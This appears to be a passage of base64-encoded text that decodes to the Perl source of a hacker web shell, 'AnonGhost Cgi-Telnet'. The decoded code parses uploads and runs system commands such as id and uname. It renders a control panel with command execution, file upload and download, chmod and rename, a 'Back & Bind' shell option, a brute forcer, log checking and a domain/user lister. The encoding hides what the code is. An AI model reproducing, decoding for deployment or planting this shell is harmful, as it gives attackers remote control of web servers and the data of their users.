kJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULg0KDQokVW5peENtZFNlcCA9ICI7IjsJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcw0KCQkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFVuaXguDQoNCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTA7CQkjIFRpbWUgaW4gc2Vjb25kcyBhZnRlciBjb21tYW5kcyB3aWxsIGJlIGtpbGxlZA0KCQkJCQkjIERvbid0IHNldCB0aGlzIHRvIGEgdmVyeSBsYXJnZSB2YWx1ZS4gVGhpcyBpcw0KCQkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0DQoJCQkJCSMgdGFrZSB2ZXJ5IGxvbmcgdG8gZXhlY3V0ZSwgbGlrZSAiZmluZCAvIi4NCgkJCQkJIyBUaGlzIGlzIHZhbGlkIG9ubHkgb24gVW5peCBzZXJ2ZXJzLiBJdCBpcw0KCQkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4NCg0KJFNob3dEeW5hbWljT3V0cHV0ID0gMTsJCQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRhIGlzIHNlbnQgdG8gdGhlDQoJCQkJCSMgYnJvd3NlciBhcyBzb29uIGFzIGl0IGlzIG91dHB1dCwgb3RoZXJ3aXNlDQoJCQkJCSMgaXQgaXMgYnVmZmVyZWQgYW5kIHNlbmQgd2hlbiB0aGUgY29tbWFuZA0KCQkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UNCgkJCQkJIyBwaW5nLCBzbyB0aGF0IHlvdSBjYW4gc2VlIHRoZSBvdXRwdXQgYXMgaXQNCgkJCQkJIyBpcyBiZWluZyBnZW5lcmF0ZWQuDQoNCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISENCg0KJENtZFNlcCA9ICgkV2luTlQgPyAkTlRDbWRTZXAgOiAkVW5peENtZFNlcCk7DQokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7DQokUGF0aFNlcCA9ICgkV2luTlQgPyAiXFwiIDogIi8iKTsNCiRSZWRpcmVjdG9yID0gKCRXaW5OVCA/ICIgMj4mMSAxPiYyIiA6ICIgMT4mMSAyPiYxIik7DQokY29scz0gMTMwOw0KJHJvd3M9IDI2Ow0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBSZWFkcyB0aGUgaW5wdXQgc2VudCBieSB0aGUgYnJvd3NlciBhbmQgcGFyc2VzIHRoZSBpbnB1dCB2YXJpYWJsZXMuIEl0DQojIHBhcnNlcyBHRVQsIFBPU1QgYW5kIG11bHRpcGFydC9mb3JtLWRhdGEgdGhhdCBpcyB1c2VkIGZvciB1cGxvYWRpbmcgZmlsZXMuDQojIFRoZSBmaWxlbmFtZSBpcyBzdG9yZWQgaW4gJGlueydmJ30gYW5kIHRoZSBkYXRhIGlzIHN0b3JlZCBpbiAkaW57J2ZpbGVkYXRhJ30uDQojIE90aGVyIHZhcmlhYmxlcyBjYW4gYmUgYWNjZXNzZWQgdXNpbmcgJGlueyd2YXInfSwgd2hlcmUgdmFyIGlzIHRoZSBuYW1lIG9mDQojIHRoZSB2YXJpYWJsZS4gTm90ZTogTW9zdCBvZiB0aGUgY29kZSBpbiB0aGlzIGZ1bmN0aW9uIGlzIHRha2VuIGZyb20gb3RoZXIgQ0dJDQojIHNjcmlwdHMuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUmVhZFBhcnNlIA0Kew0KCWxvY2FsICgqaW4pID0gQF8gaWYgQF87DQoJbG9jYWwgKCRpLCAkbG9jLCAka2V5LCAkdmFsKTsNCgkkTXVsdGlwYXJ0Rm9ybURhdGEgPSAkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLzsNCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQ0KCXsNCgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQoJfQ0KCWVsc2lmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIlBPU1QiKQ0KCXsNCgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOw0KCQlyZWFkKFNURElOLCAkaW4sICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KCX0NCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBkYXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZlciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhlYWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0KCQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0KCQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIvOw0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxufFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNwbGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGldID1+IHMvXCsvIC9nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsNCgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICIiIGlmIChkZWZpbmVkKCRpbnska2V5fSkpOw0KCQkJJGlueyRrZXl9IC49ICR2YWw7DQoJCX0NCgl9DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIGZ1bmN0aW9uIEVuY29kZURpcjogZW5jb2RlIGJhc2U2NCBQYXRoDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgRW5jb2RlRGlyDQp7DQoJbXkgJGRpciA9IHNoaWZ0Ow0KCSRkaXIgPSB0cmltKGVuY29kZV9iYXNlNjQoJGRpcikpOw0KCSRkaXIgPX4gcy8oXHJ8XG4pLy87DQoJcmV0dXJuICRkaXI7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBQYWdlIEhlYWRlcg0KIyBBcmd1bWVudCAxOiBGb3JtIGl0ZW0gbmFtZSB0byB3aGljaCBmb2N1cyBzaG91bGQgYmUgc2V0DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlSGVhZGVyDQp7DQoJJEVuY29kZUN1cnJlbnREaXIgPSBFbmNvZGVEaXIoJEN1cnJlbnREaXIpOw0KCW15ICRpZCA9IGBpZGAgaWYoISRXaW5OVCk7DQoJbXkgJGluZm8gPSBgdW5hbWUgLXMgLW4gLXIgLWlgOw0KCXByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOw0KCXByaW50IDw8RU5EOw0KPGh0bWw+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4NCjx0aXRsZT5Bbm9uR2hvc3QgQ2dpLVRlbG5ldCBbICRWZXJzaW9uIF08L3RpdGxlPg0KJEh0bWxNZXRhSGVhZGVyDQo8L2hlYWQ+DQo8c3R5bGU+DQpib2R5ew0KZm9udDogMTBwdCBWZXJkYW5hOw0KY29sb3I6ICNmZmY7DQp9DQp0cix0ZCx0YWJsZSxpbnB1dCx0ZXh0YXJlYSB7DQpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLUxFRlQ6ICAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsNCn0NCiNkb21haW4gdHI6aG92ZXJ7DQpiYWNrZ3JvdW5kLWNvbG9yOiAjNDQ0Ow0KfQ0KdGQgew0KY29sb3I6ICMyQkE4RUM7DQp9DQoubGlzdGRpciB0ZHsNCgl0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQoubGlzdGRpciB0aHsNCgljb2xvcjogI0ZGOTkwMDsNCn0NCi5kaXIsLmZpbGUNCnsNCgl0ZXh0LWFsaWduOiBsZWZ0ICFpbXBvcnRhbnQ7DQp9DQouZGlyew0KCWZvbnQtc2l6ZTogMTBwdDsgDQoJZm9udC13ZWlnaHQ6IGJvbGQ7DQp9DQp0YWJsZSB7DQpCQUNLR1JPVU5ELUNPTE9SOiAjMTExOw0KfQ0KaW5wdXQgew0KQkFDS0dST1VORC1DT0xPUjogQmxhY2s7DQpjb2xvcjogI2ZmOTkwMDsNCn0NCmlucHV0LnN1Ym1pdCB7DQp0ZXh0LXNoYWRvdzogMHB0IDBwdCAwLjNlbSBjeWFuLCAwcHQgMHB0IDAuM2VtIGN5YW47DQpjb2xvcjogI0ZGRkZGRjsNCmJvcmRlci1jb2xvcjogIzAwOTkwMDsNCn0NCmNvZGUgew0KYm9yZGVyOiBkYXNoZWQgMHB4ICMzMzM7DQpjb2xvcjogd2hpbGU7DQp9DQpydW4gew0KYm9yZGVyCQkJOiBkYXNoZWQgMHB4ICMzMzM7DQpjb2xvcjogI0ZGMDBBQTsNCn0NCnRleHRhcmVhIHsNCkJBQ0tHUk9VTkQtQ09MT1I6ICMxYjFiMWI7DQpmb250OiBGaXhlZHN5cyBib2xkOw0KY29sb3I6ICNhYWE7DQp9DQpBOmxpbmsgew0KCUNPTE9SOiAjMkJBOEVDOyBURVhULURFQ09SQVRJT046IG5vbmUNCn0NCkE6dmlzaXRlZCB7DQoJQ09MT1I6ICMyQkE4RUM7IFRFWFQtREVDT1JBVElPTjogbm9uZQ0KfQ0KQTpob3ZlciB7DQoJdGV4dC1zaGFkb3c6IDBwdCAwcHQgMC4zZW0gY3lhbiwgMHB0IDBwdCAwLjNlbSBjeWFuOw0KCWNvbG9yOiAjRkZGRkZGOyBURVhULURFQ09SQVRJT046IG5vbmUNCn0NCkE6YWN0aXZlIHsNCgljb2xvcjogUmVkOyBURVhULURFQ09SQVRJT046IG5vbmUNCn0NCi5saXN0ZGlyIHRyOmhvdmVyew0KCWJhY2tncm91bmQ6ICM0NDQ7DQp9DQoubGlzdGRpciB0cjpob3ZlciB0ZHsNCgliYWNrZ3JvdW5kOiAjNDQ0Ow0KCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsNCgljb2xvcjogI0ZGRkZGRjsgVEVYVC1ERUNPUkFUSU9OOiBub25lOw0KfQ0KLm5vdGxpbmV7DQoJYmFja2dyb3VuZDogIzExMTsNCn0NCi5saW5lew0KCWJhY2tncm91bmQ6ICMyMjI7DQp9DQo8L3N0eWxlPg0KPHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQpmdW5jdGlvbiBFbmNvZGVyKG5hbWUpDQp7DQoJdmFyIGUgPSAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQobmFtZSk7DQoJZS52YWx1ZSA9IGJ0b2EoZS52YWx1ZSk7DQoJcmV0dXJuIHRydWU7DQp9DQpmdW5jdGlvbiBjaG1vZF9mb3JtKGksZmlsZSkNCnsNCglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZVBlcm1zXyIraSkuaW5uZXJIVE1MPSI8Zm9ybSBuYW1lPUZvcm1QZXJtc18iICsgaSsgIiBhY3Rpb249JycgbWV0aG9kPSdQT1NUJz48aW5wdXQgaWQ9dGV4dF8iICsgaSArICIgIG5hbWU9Y2htb2QgdHlwZT10ZXh0IHNpemU9NSAvPjxpbnB1dCB0eXBlPXN1Ym1pdCBjbGFzcz0nc3VibWl0JyB2YWx1ZT1PSz48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hIHZhbHVlPSdndWknPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWQgdmFsdWU9JyRFbmNvZGVDdXJyZW50RGlyJz48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1mIHZhbHVlPSciK2ZpbGUrIic+PC9mb3JtPiI7DQoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7DQp9DQpmdW5jdGlvbiBybV9jaG1vZF9mb3JtKHJlc3BvbnNlLGkscGVybXMsZmlsZSkNCnsNCglyZXNwb25zZS5pbm5lckhUTUwgPSAiPHNwYW4gb25jbGljaz1cXFwiY2htb2RfZm9ybSgiICsgaSArICIsJyIrIGZpbGUrICInKVxcXCIgPiIrIHBlcm1zICsiPC9zcGFuPjwvdGQ+IjsNCn0NCmZ1bmN0aW9uIHJlbmFtZV9mb3JtKGksZmlsZSxmKQ0Kew0KCWYucmVwbGFjZSgvXFxcXC9nLCJcXFxcXFxcXCIpOw0KCXZhciBiYWNrPSJybV9yZW5hbWVfZm9ybSgiK2krIixcXFwiIitmaWxlKyJcXFwiLFxcXCIiK2YrIlxcXCIpOyByZXR1cm4gZmFsc2U7IjsNCglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZV8iK2kpLmlubmVySFRNTD0iPGZvcm0gbmFtZT1Gb3JtUGVybXNfIiArIGkrICIgYWN0aW9uPScnIG1ldGhvZD0nUE9TVCc+PGlucHV0IGlkPXRleHRfIiArIGkgKyAiICBuYW1lPXJlbmFtZSB0eXBlPXRleHQgdmFsdWU9ICciK2ZpbGUrIicgLz48aW5wdXQgdHlwZT1zdWJtaXQgY2xhc3M9J3N1Ym1pdCcgdmFsdWU9T0s+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBiYWNrICsgIicgdmFsdWU9Q2FuY2VsPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJEVuY29kZUN1cnJlbnREaXInPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWYgdmFsdWU9JyIrZmlsZSsiJz48L2Zvcm0+IjsNCglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgidGV4dF8iICsgaSkuZm9jdXMoKTsNCn0NCmZ1bmN0aW9uIHJtX3JlbmFtZV9mb3JtKGksZmlsZSxmKQ0Kew0KCWlmKGY9PSdmJykNCgl7DQoJCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJGaWxlXyIraSkuaW5uZXJIVE1MPSI8YSBocmVmPSc/YT1jb21tYW5kJmQ9JEVuY29kZUN1cnJlbnREaXImYz1lZGl0JTIwIitmaWxlKyIlMjAnPiIgK2ZpbGUrICI8L2E+IjsNCgl9ZWxzZQ0KCXsNCgkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9IjxhIGhyZWY9Jz9hPWd1aSZkPSIrZisiJz5bICIgK2ZpbGUrICIgXTwvYT4iOw0KCX0NCn0NCjwvc2NyaXB0Pg0KPGJvZHkgb25Mb2FkPSJkb2N1bWVudC5mLkBfLmZvY3VzKCkiIGJnY29sb3I9IiMwYzBjMGMiIHRvcG1hcmdpbj0iMCIgbGVmdG1hcmdpbj0iMCIgbWFyZ2lud2lkdGg9IjAiIG1hcmdpbmhlaWdodD0iMCI+DQo8Y2VudGVyPjxjb2RlPg0KPHRhYmxlIGJvcmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+DQo8dHI+DQoJPHRkIGFsaWduPSJjZW50ZXIiIHJvd3NwYW49Mz4NCgkJPGI+PGZvbnQgc2l6ZT0iMyI+by0tLVsgICRFZGl0UGVyc2lvbiBdLS0tbzwvZm9udD48L2I+DQoJPC90ZD4NCgk8dGQ+DQoJCSRpbmZvDQoJPC90ZD4NCgk8dGQ+U2VydmVyIElQOjxmb250IGNvbG9yPSIjZmY5OTAwIj4gJEVOVnsnU0VSVkVSX0FERFInfTwvZm9udD4gfCBZb3VyIElQOiA8Zm9udCBjb2xvcj0iI2ZmOTkwMCI+JEVOVnsnUkVNT1RFX0FERFInfTwvZm9udD4NCgk8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZCBjb2xzcGFuPSIyIj4NCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbiI+SG9tZTwvYT4gfCANCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWNvbW1hbmQmZD0kRW5jb2RlQ3VycmVudERpciI+Q29tbWFuZDwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9Z3VpJmQ9JEVuY29kZUN1cnJlbnREaXIiPkdVSTwvYT4gfCANCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPXVwbG9hZCZkPSRFbmNvZGVDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCANCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmQ9JEVuY29kZUN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWJhY2tiaW5kIj5CYWNrICYgQmluZDwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9YnJ1dGVmb3JjZXIiPkJydXRlIEZvcmNlcjwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9Y2hlY2tsb2ciPkNoZWNrIExvZzwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG9tYWluc3VzZXIiPkRvbWFpbnMvVXNlcnM8L2E+IHwNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWxvZ291dCI+TG9nb3V0PC9hPiB8DQo8YSB0YXJnZXQ9J19ibGFuaycgaHJlZj0iIyI+SGVscDwvYT4NCjwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkIGNvbHNwYW49IjIiPg0KJGlkDQo8L3RkPg0KPC90cj4NCjwvdGFibGU+DQo8Zm9udCBpZD0iUmVzcG9uc2VEYXRhIiBjb2xvcj0iI0ZGRkZGRiIgPg0KRU5EDQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgTG9naW4gU2NyZWVuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRMb2dpblNjcmVlbg0Kew0KCXByaW50IDw8RU5EOw0KPHByZT48c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+DQpUeXBpbmdUZXh0ID0gZnVuY3Rpb24oZWxlbWVudCwgaW50ZXJ2YWwsIGN1cnNvciwgZmluaXNoZWRDYWxsYmFjaykgew0KICBpZigodHlwZW9mIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkID09ICJ1bmRlZmluZWQiKSB8fCAodHlwZW9mIGVsZW1lbnQuaW5uZXJIVE1MID09ICJ1bmRlZmluZWQiKSkgew0KICAgIHRoaXMucnVubmluZyA9IHRydWU7CS8vIE5ldmVyIHJ1bi4NCiAgICByZXR1cm47DQogIH0NCiAgdGhpcy5lbGVtZW50ID0gZWxlbWVudDsNCiAgdGhpcy5maW5pc2hlZENhbGxiYWNrID0gKGZpbmlzaGVkQ2FsbGJhY2sgPyBmaW5pc2hlZENhbGxiYWNrIDogZnVuY3Rpb24oKSB7IHJldHVybjsgfSk7DQogIHRoaXMuaW50ZXJ2YWwgPSAodHlwZW9mIGludGVydmFsID09ICJ1bmRlZmluZWQiID8gMTAwIDogaW50ZXJ2YWwpOw0KICB0aGlzLm9yaWdUZXh0ID0gdGhpcy5lbGVtZW50LmlubmVySFRNTDsNCiAgdGhpcy51bnBhcnNlZE9yaWdUZXh0ID0gdGhpcy5vcmlnVGV4dDsNCiAgdGhpcy5jdXJzb3IgPSAoY3Vyc29yID8gY3Vyc29yIDogIiIpOw0KICB0aGlzLmN1cnJlbnRUZXh0ID0gIiI7DQogIHRoaXMuY3VycmVudENoYXIgPSAwOw0KICB0aGlzLmVsZW1lbnQudHlwaW5nVGV4dCA9IHRoaXM7DQogIGlmKHRoaXMuZWxlbWVudC5pZCA9PSAiIikgdGhpcy5lbGVtZW50LmlkID0gInR5cGluZ3RleHQiICsgVHlwaW5nVGV4dC5jdXJyZW50SW5kZXgrKzsNCiAgVHlwaW5nVGV4dC5hbGwucHVzaCh0aGlzKTsNCiAgdGhpcy5ydW5uaW5nID0gZmFsc2U7DQogIHRoaXMuaW5UYWcgPSBmYWxzZTsNCiAgdGhpcy50YWdCdWZmZXIgPSAiIjsNCiAgdGhpcy5pbkhUTUxFbnRpdHkgPSBmYWxzZTsNCiAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiI7DQp9DQpUeXBpbmdUZXh0LmFsbCA9IG5ldyBBcnJheSgpOw0KVHlwaW5nVGV4dC5jdXJyZW50SW5kZXggPSAwOw0KVHlwaW5nVGV4dC5ydW5BbGwgPSBmdW5jdGlvbigpIHsNCiAgZm9yKHZhciBpID0gMDsgaSA8IFR5cGluZ1RleHQuYWxsLmxlbmd0aDsgaSsrKSBUeXBpbmdUZXh0LmFsbFtpXS5ydW4oKTsNCn0NClR5cGluZ1RleHQucHJvdG90eXBlLnJ1biA9IGZ1bmN0aW9uKCkgew0KICBpZih0aGlzLnJ1bm5pbmcpIHJldHVybjsNCiAgaWYodHlwZW9mIHRoaXMub3JpZ1RleHQgPT0gInVuZGVmaW5lZCIpIHsNCiAgICBzZXRUaW1lb3V0KCJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnIiArIHRoaXMuZWxlbWVudC5pZCArICInKS50eXBpbmdUZXh0LnJ1bigpIiwgdGhpcy5pbnRlcnZhbCk7CS8vIFdlIGhhdmVuJ3QgZmluaXNoZWQgbG9hZGluZyB5ZXQuICBIYXZlIHBhdGllbmNlLg0KICAgIHJldHVybjsNCiAgfQ0KICBpZih0aGlzLmN1cnJlbnRUZXh0ID09ICIiKSB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MID0gIiI7DQovLyAgdGhpcy5vcmlnVGV4dCA9IHRoaXMub3JpZ1RleHQucmVwbGFjZSgvPChbXjxdKSo+LywgIiIpOyAgICAgLy8gU3RyaXAgSFRNTCBmcm9tIHRleHQuDQogIGlmKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCkgew0KICAgIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI8IiAmJiAhdGhpcy5pblRhZykgew0KICAgICAgdGhpcy50YWdCdWZmZXIgPSAiPCI7DQogICAgICB0aGlzLmluVGFnID0gdHJ1ZTsNCiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsNCiAgICAgIHRoaXMucnVuKCk7DQogICAgICByZXR1cm47DQogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI+IiAmJiB0aGlzLmluVGFnKSB7DQogICAgICB0aGlzLnRhZ0J1ZmZlciArPSAiPiI7DQogICAgICB0aGlzLmluVGFnID0gZmFsc2U7DQogICAgICB0aGlzLmN1cnJlbnRUZXh0ICs9IHRoaXMudGFnQnVmZmVyOw0KICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOw0KICAgICAgdGhpcy5ydW4oKTsNCiAgICAgIHJldHVybjsNCiAgICB9IGVsc2UgaWYodGhpcy5pblRhZykgew0KICAgICAgdGhpcy50YWdCdWZmZXIgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7DQogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7DQogICAgICB0aGlzLnJ1bigpOw0KICAgICAgcmV0dXJuOw0KICAgIH0gZWxzZSBpZih0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKSA9PSAiJiIgJiYgIXRoaXMuaW5IVE1MRW50aXR5KSB7DQogICAgICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgPSAiJiI7DQogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IHRydWU7DQogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7DQogICAgICB0aGlzLnJ1bigpOw0KICAgICAgcmV0dXJuOw0KICAgIH0gZWxzZSBpZih0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKSA9PSAiOyIgJiYgdGhpcy5pbkhUTUxFbnRpdHkpIHsNCiAgICAgIHRoaXMuSFRNTEVudGl0eUJ1ZmZlciArPSAiOyI7DQogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IGZhbHNlOw0KICAgICAgdGhpcy5jdXJyZW50VGV4dCArPSB0aGlzLkhUTUxFbnRpdHlCdWZmZXI7DQogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7DQogICAgICB0aGlzLnJ1bigpOw0KICAgICAgcmV0dXJuOw0KICAgIH0gZWxzZSBpZih0aGlzLmluSFRNTEVudGl0eSkgew0KICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyICs9IHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpOw0KICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOw0KICAgICAgdGhpcy5ydW4oKTsNCiAgICAgIHJldHVybjsNCiAgICB9IGVsc2Ugew0KICAgICAgdGhpcy5jdXJyZW50VGV4dCArPSB0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKTsNCiAgICB9DQogICAgdGhpcy5lbGVtZW50LmlubmVySFRNTCA9IHRoaXMuY3VycmVudFRleHQ7DQogICAgdGhpcy5lbGVtZW50LmlubmVySFRNTCArPSAodGhpcy5jdXJyZW50Q2hhciA8IHRoaXMub3JpZ1RleHQubGVuZ3RoIC0gMSA/ICh0eXBlb2YgdGhpcy5jdXJzb3IgPT0gImZ1bmN0aW9uIiA/IHRoaXMuY3Vyc29yKHRoaXMuY3VycmVudFRleHQpIDogdGhpcy5jdXJzb3IpIDogIiIpOw0KICAgIHRoaXMuY3VycmVudENoYXIrKzsNCiAgICBzZXRUaW1lb3V0KCJkb2N1bWVudC5nZXRFbG